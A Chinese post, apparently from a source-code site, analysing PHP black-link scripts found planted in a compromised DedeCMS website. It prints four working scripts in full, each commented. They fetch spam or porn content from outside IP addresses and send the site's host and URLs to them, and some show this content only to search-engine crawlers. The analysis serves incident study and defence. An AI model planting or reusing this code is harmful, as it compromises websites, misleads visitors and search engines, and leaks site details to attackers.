admin 织梦被挂黑链及file_get_contents函数
最近公司的一台服务器上的网站,页面被挂黑链,程序是织梦的,下面我们研究一下挂马的代码。
<?php
set_time_limit(0); //设置程序永久执行
header("Content-Type: text/html;charset=utf-8"); //设置utf-8
date_default_timezone_set('PRC'); //设定用于所有日期时间函数的默认时区
$Percent = rand(0,100); //生成随便整数
if($Percent<60)
$asdasp4 = "http://45.207.33.91/";
else
$asdasp4 = "http://45.207.33.91/"; //这两个IP一致,不管是小于60,还是大于60都是一个IP
$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']; //获取URL地址和文件名
$Cf=file_get_contents($asdasp4."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);
//获取45.207.33.91上的内容,是一个色情广告。
echo $Cf;
die; //中止脚本执行,下面不在执行。
?>
<?php
header('Content-Type:text/html;charset=gb2312');
$key= $_SERVER["HTTP_USER_AGENT"]; //用来检查浏览页面的访问者在用什么操作系统(包括版本号)浏览器(包括版本号)和用户个人偏好的代码
if(strpos($key,'oogle')!== false||strpos($key,'aidu')!==false) //查找浏览器oogle非恒等于假,或者查找浏览器aidu非恒等于假
{
$file = file_get_contents('http://45.207.33.91/'); //满足if条件则获取该地址内容
echo $file;
exit ; //结束
}
?>
第三个脚本是把第一和二做了整合,不做注释了
<?php
header('Content-Type:text/html;charset=gb2312');
$key= $_SERVER["HTTP_USER_AGENT"];
if(strpos($key,strtolower('HaosouSpider'))!== false||strpos($key,strtolower('baidu'))!== false||strpos($key,strtolower('Yisou'))!== false||strpos($key,strtolower('Sogou'))!== false||strpos($key,strtolower('YisouSpider'))!== false||strpos($key,strtolower('360Spider'))!== false||strpos($key,strtolower('Baiduspide'))!== false||strpos($key,strtolower('Soso'))!== false )
{
date_default_timezone_set('PRC');
$TD_server = "http://103.214.143.26/";
$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$Content_mb=file_get_contents($TD_server."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);
echo $Content_mb;
}
?>
<?php set_time_limit(0); header("Content-Type: text/html;charset=utf-8"); $cawer1qw351gasdqa5rhgq = "http://45.207.33.91/"; $host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']; //构成URL当前页 $Content_mb=getHTTPPage($cawer1qw351gasdqa5rhgq."/index.php?host=".$host_name); //调用远程网站 function getHTTPPage($url) { //调用远程网站函数 $opts = array( 'http'=>array( 'method'=>"GET", 'header'=>"User-Agent: aQ0O010O" ) ); $context = stream_context_create($opts); $html = @file_get_contents($url, false, $context); //访问远程网站,你的URL也上传过去了 if (empty($html)) { exit("<p align='center'><font color='red'><b>Connection Error!</b></font></p>"); } return $html; } echo $Content_mb; ?>
END
如本资源侵犯了您的权益,请联系投诉邮箱admin@wmphp.com进行举报!我们将在收到邮件的1个小时内处理完毕。
本站仅为平台,发布的资源均为用户投稿或转载!所有资源仅供参考学习使用,请在下载后的24小时内删除,禁止商用!
Wmphp.com(完美源码)助力正版,如您有自己的原创产品,可以联系客服投稿,代理出售!
Wmphp.com(完美源码)客服QQ:136882447
Wmphp.com(完美源码)商务电话(仅对企业客户/个人用户):15120086569 (微信同步)
请注意:本站不提供任何免费的技术咨询服务,为了节约时间,下载前 请确认自己会技术
完美源码 » 织梦被挂黑链及file_get_contents函数
完美源码 » 织梦被挂黑链及file_get_contents函数
